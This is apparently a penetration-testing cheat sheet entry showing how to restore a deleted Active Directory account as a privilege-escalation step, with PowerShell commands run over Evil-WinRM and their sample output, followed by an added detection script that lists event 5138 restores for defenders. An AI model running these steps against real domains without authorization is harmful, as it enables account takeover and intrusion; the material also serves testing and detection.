Privesc #1: Restore deleted AD account
1. Import AD module
import-module activedirectory
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> import-module activedirectory
2. Query all deleted objects in the domain (the filter excludes the Deleted Objects container itself)
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Deleted : True
DistinguishedName : CN=Another User\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=example,DC=com
Name : Another User
DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass : user
ObjectGUID : ebe15df5-e265-45ec-b7fc-359877217138
3. Get all details for the deleted account
Get-ADObject -filter { SAMAccountName -eq '<DELETED_USER>' } -includeDeletedObjects -property *
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter { SAMAccountName -eq 'another.user' } -includeDeletedObjects -property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : example.com/Deleted Objects/Another User
DEL:ebe15df5-e265-45ec-b7fc-359877217138
CN : Another User
DEL:ebe15df5-e265-45ec-b7fc-359877217138
...[SNIP]...
4. Restore the deleted account
# Give the restored object a new name so the restore does not fail with an "object already exists" error if a live object with the original name is present
Restore-ADObject -Identity <OBJECT_GUID> -NewName '<DELETED_USER>.2' -TargetPath 'CN=Users,DC=<EXAMPLE>,DC=<COM>'
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Restore-ADObject -Identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName 'Another User2' -TargetPath 'CN=Users,DC=EXAMPLE,DC=COM'
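Added example, not part of the original cheat sheet: a defender-side check that lists directory object reanimation events (Security event 5138, "A directory service object was undeleted") from a domain controller, so a restore like step 4 shows up together with the account that performed it, the old DN in the Deleted Objects container and the new DN under the target path. It assumes the "Audit Directory Service Changes" subcategory is enabled on the DC; the parameter names and the lookback window are my own.

```powershell
# Added example (not from the original page): surface AD object reanimation
# on a domain controller from Security event 5138. Run on the DC, or point
# -ComputerName at it. Field names follow the 5138 EventData schema
# (SubjectUserName, SubjectDomainName, OldObjectDN, NewObjectDN, ObjectGUID,
# ObjectClass). -Hours and -ComputerName are assumed parameter names.
param(
    [int]$Hours = 24,
    [string]$ComputerName = $env:COMPUTERNAME
)

$since = (Get-Date).AddHours(-$Hours)
$events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
    LogName   = 'Security'
    Id        = 5138
    StartTime = $since
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Parse the event XML into a name -> value table of its EventData fields
    $xml = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    [pscustomobject]@{
        Time       = $e.TimeCreated
        Actor      = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
        Class      = $d['ObjectClass']
        ObjectGUID = $d['ObjectGUID']
        OldDN      = $d['OldObjectDN']   # e.g. CN=...\0ADEL:<guid>,CN=Deleted Objects,...
        NewDN      = $d['NewObjectDN']   # e.g. CN=<new name>,CN=Users,...
    }
}
```

Reviewing OldDN against NewDN shows which container the object landed in and whether the RDN was changed on restore, as the `-NewName` argument in step 4 does; an actor that is not a known recovery or helpdesk account is the signal to escalate.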